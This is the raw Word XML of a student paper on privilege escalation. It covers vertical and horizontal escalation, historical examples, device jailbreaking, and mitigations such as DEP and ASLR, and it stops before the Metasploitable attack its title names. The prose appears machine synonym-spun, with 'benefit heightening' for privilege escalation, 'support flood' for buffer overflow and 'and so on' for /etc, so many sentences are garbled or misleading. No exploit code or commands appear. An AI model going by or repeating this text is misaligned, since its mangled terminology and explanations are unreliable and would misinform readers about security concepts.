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0ED31" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00254673" w:rsidP="00254673">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:sectPr w:rsidR="00AF22DD">
          <w:headerReference w:type="even" r:id="rId7"/>
          <w:headerReference w:type="default" r:id="rId8"/>
          <w:headerReference w:type="first" r:id="rId9"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1292" w:right="1400" w:bottom="1561" w:left="1397" w:header="739" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk5326398"/>
      <w:r w:rsidRPr="00254673">
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalating privileges on a Windows machine and remotely adding users and administrator to exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00254673">
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="7CB81FB4" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00054B99" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="871" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA5315B" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="871" w:right="852" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Chirag Phor</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263385D" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00054B99">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="15" w:right="0" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13762C7E" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00054B99">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="15" w:right="5" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CSE Department, VIT, VELLORE Chirag.phor2016@vitstudent.ac.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795960C" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1732"/>
          <w:tab w:val="center" w:pos="2983"/>
          <w:tab w:val="right" w:pos="4264"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00054B99">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA0DA6" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00054B99" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="741" w:right="0" w:firstLine="699"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Keshav Moorthy</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DA5121" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00054B99">
      <w:pPr>
        <w:spacing w:after="87"/>
        <w:ind w:left="15" w:right="6" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50671ED4" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00054B99">
      <w:pPr>
        <w:spacing w:after="40" w:line="257" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CSE</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Department, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>VIT</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>VELLORE</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Keshav.moorthy2016@vitstudent.ac.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F168711" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00AF22DD">
      <w:pPr>
        <w:sectPr w:rsidR="00AF22DD">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1207" w:bottom="1440" w:left="1839" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="2993" w:space="1604"/>
            <w:col w:w="4264"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E486374" w14:textId="216AFAC0" w:rsidR="00054B99" w:rsidRDefault="00753988" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="256" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidR="00217D3F" w:rsidRPr="00217D3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Benefit heightening is the demonstration of abusing a bug, plan defect or design oversight in a working framework or programming application to increase raised access to assets that are regularly shielded from an application or client. The outcome is that an application with a greater number of benefits than proposed by the application engineer or framework chairman can perform unapproved activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C2F88" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="256" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Keywords—</w:t>
      </w:r>
      <w:r w:rsidR="003775F4" w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Escalating</w:t>
      </w:r>
      <w:r w:rsidR="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003775F4" w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003775F4" w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003775F4" w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> remotely </w:t>
      </w:r>
      <w:r w:rsidR="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">access, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003775F4" w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26585ECE" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>I.I</w:t>
      </w:r>
      <w:r>
        <w:t>NTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B229806" w14:textId="6A1D6D84" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most PC frameworks are intended for use with various client accounts, every one of which has capacities known as benefits. Basic benefits incorporate review and altering records, or adjusting framework documents. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBA32B" w14:textId="05FF4C7B" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Benefit acceleration implies a client gets benefits they are not qualified for. These benefits can be utilized to erase documents, see private data, or introduce undesirable projects, for example, infections. It as a rule happens when a framework has a bug that enables security to be avoided or, on the other hand, has imperfect plan suppositions about how it will be utilized. Benefit heightening happens in two structures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F074143" w14:textId="2E25B0E6" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vertical benefit heightening, otherwise called benefit rise, where a lower benefit client or application gets to capacities or substance saved for higher benefit clients or applications (for example Web Banking clients can get to webpage authoritative capacities or the secret key for a cell phone can be avoided.) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC5FA1" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Flat benefit heightening, where a typical client gets to capacities or substance saved for other ordinary clients (for example Web Banking User A gets to the Internet financial balance of User B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5DAC2" w14:textId="5DC2E96B" w:rsidR="003775F4" w:rsidRDefault="003775F4" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Vertic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D3C57D7" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">This sort of benefit acceleration happens when the client or procedure can acquire a more elevated amount of access </w:t>
      </w:r>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">than a head or framework designer planned, potentially by performing piece level activities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E7F021" w14:textId="65698C68" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B62173" w14:textId="0CC72AEA" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At times, a high-benefit application accept that it would just be given information coordinating its interface particular, in this way doesn't approve this information. At that point, an assailant might most likely adventure this supposition, so as to run unapproved code with the application's benefits: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD76EB0" w14:textId="75EFD4E4" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A few Windows administrations are arranged to keep running under the Local System client account. A powerlessness, for example, a support flood might be utilized to execute self-assertive code with benefit raised to Local System. Then again, a framework administration that is imitating a lesser client can raise that client's benefits if blunders are not taken care of accurately while the client is being mimicked (for example in the event that the client has presented a noxious mistake handler) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8F20E" w14:textId="0A1C2CD0" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Under some inheritance renditions of the Microsoft Windows working framework, the All Users screensaver keeps running under the Local System account – any record that can supplant the current screensaver twofold in the document framework or Registry can in this way hoist benefits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485AB2F7" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r>
        <w:t>In specific variants of the Linux piece it was conceivable to compose a program that would set its present registry to/and so on/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, demand that a center dump be performed in the event that it crashes and after that have itself executed by another procedure. The center dump record would have been put at the program's present index, that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is,/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>and so on/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> would have regarded it as a content document training it to run programs on timetable. Since the substance of the record would be under assailant's control, the aggressor would most likely execute any program with root benefits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A908A31" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DAEE88D" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00217D3F">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross Zone Scripting is a kind of benefit acceleration assault in which a site subverts the security </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">model of internet browsers, accordingly enabling it to run malevolent code on customer PCs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280AFA52" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">There are additionally circumstances where an application can utilize other high benefit benefits and has inaccurate presumptions about how a customer could control its utilization of these administrations. An application that can execute Command line or shell directions could have a Shell Injection powerlessness in the event that it utilizes unvalidated contribution as a component of an executed order. An aggressor would then have the capacity to run framework directions utilizing the application's benefits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AAF97C" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="15"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t>Texas Instruments number crunchers (especially the TI-85 and TI-82) were initially intended to utilize just deciphered projects written in vernaculars of TI-BASIC; in any case, after clients found bugs that could be abused to permit local Z-80 code to keep running on the adding machine equipment, TI discharged programming information to help outsider advancement. (This did not carry on to the ARM-based TI-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>Nspire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">, for which escapes utilizing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>Ndless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve"> have been found however are still effectively battled against by Texas Instruments.) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CDDD76" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">A few renditions of the iPhone enable an unapproved client to get to the telephone while it is locked.[1] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319CCC0" w14:textId="6EA9F94C" w:rsidR="003775F4" w:rsidRPr="00985DDC" w:rsidRDefault="003775F4" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Jailbreaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094EF3A1" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">An escape is the demonstration or apparatus used to play out the demonstration of breaking out of a chroot or correctional facility in UNIX-like working </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>systems[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">2] or bypassing computerized rights the executives (DRM). In the previous case, it enables the client to see documents outside of the filesystem that the chairman plans to make accessible to the application or client being referred to. With regards to DRM, this enables the client to run discretionarily characterized code on gadgets with DRM just as break out of chroot-like limitations. The term started with the iPhone/iOS jailbreaking network and has additionally been utilized as a term for PlayStation Portable hacking; these gadgets have more than once been liable to escapes, permitting the execution of self-assertive code, and at times have had those escapes impaired by seller refreshes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2940D" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">iOS frameworks including the iPhone, iPad, and iPod contact have been liable to iOS jailbreaking endeavors since they were discharged, and proceeding with every firmware update.[3][4] iOS correctional facility breaking instruments incorporate the choice to introduce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>Cydia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">, an outsider option in contrast to the App Store, as an approach to discover and introduce framework changes and pairs. To avert iOS jailbreaking, Apple has made the gadget boot ROM execute checks for SHSH masses so as to deny transfers of custom pieces and counteract programming downsizes to prior, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>jailbreakable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve"> firmware. In an "untethered" escape, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>iBoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve"> condition is changed to execute a boot ROM abuse and permit accommodation of a fixed low dimension bootloader or hack the bit to present the jailbroken bit after the SHSH check. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B536C70" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="735"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">A comparative strategy for jailbreaking exists for S60 Platform cell phones, where utilities such </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>HelloOX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve"> permit the execution of unsigned code and full access to framework files.[5][6] or altered firmware (like the M33 hacked firmware utilized for the PlayStation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>Portable)[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">7] to go around confinements on unsigned code. Nokia has since issued updates to control unapproved jailbreaking, in a way like Apple. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A992E" w14:textId="5A68AEBD" w:rsidR="003775F4" w:rsidRDefault="00217D3F" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t>A comparable strategy for jailbreaking in an Android gadget is called establishing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB5B50" w14:textId="77777777" w:rsidR="00217D3F" w:rsidRDefault="00217D3F" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve">On account of gaming reassures, jailbreaking is frequently used to execute homebrew diversions. In 2011, Sony, with help from law office Kilpatrick Stockton, sued 21-year-old George </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>Hotz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve"> and partners of the gathering fail0verflow for jailbreaking the PlayStation 3 (see Sony Computer Entertainment America v. George </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t>Hotz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00217D3F">
        <w:t xml:space="preserve"> and PlayStation Jailbreak). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2054504D" w14:textId="3C8CDB06" w:rsidR="003775F4" w:rsidRPr="00985DDC" w:rsidRDefault="003775F4" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Mitigation strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCA941A" w14:textId="29DD5DE3" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Working frameworks and clients can utilize the accompanying methodologies to lessen the danger of benefit acceleration: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA264A0" w14:textId="2A696F3E" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•Data Execution Prevention </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0871A445" w14:textId="1244DE87" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•Address space design randomization (to make it harder for support invades to execute special guidelines at known locations in memory) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A9B6" w14:textId="6798340A" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•Running applications with least benefit (for instance by running Internet Explorer with the Administrator SID crippled in the process token) so as to diminish the capacity of support overwhelm endeavors to mishandle the benefits of a raised client. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDAE02A" w14:textId="34E6459E" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>•Requiring portion mode code to be carefully marked.</w:t>
      </w:r>
    </w:p>
